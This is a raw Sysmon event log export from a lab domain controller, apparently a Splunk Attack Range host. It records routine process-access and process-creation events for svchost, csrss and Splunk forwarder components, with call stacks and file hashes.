13:21:15.318{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005604Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:15.318{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005603Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:15.318{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005602Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:15.318{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005601Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:15.318{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-454B-6000-7301-000000009A01}4372C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005600Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:15.318{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-454B-6000-7301-000000009A01}4372C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005599Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:15.178{08A6967A-454B-6000-7301-000000009A01}4372C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000005638Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:16.943{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-454C-6000-7501-000000009A01}1292C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005637Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:16.943{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005636Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:16.943{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005635Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:16.943{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005634Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:16.943{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005633Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:16.943{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005632Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:16.943{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005631Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:16.943{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005630Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:16.943{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005629Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:16.943{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005628Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:16.943{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-454C-6000-7501-000000009A01}1292C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005627Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:16.943{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-454C-6000-7501-000000009A01}1292C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005626Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:16.803{08A6967A-454C-6000-7501-000000009A01}1292C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000005625Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:16.287{08A6967A-454B-6000-7401-000000009A01}43362232C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005624Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:16.130{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-454B-6000-7401-000000009A01}4336C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005623Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:16.130{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005622Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:16.130{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005621Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:16.130{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005620Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:16.130{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005619Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:16.130{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005618Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 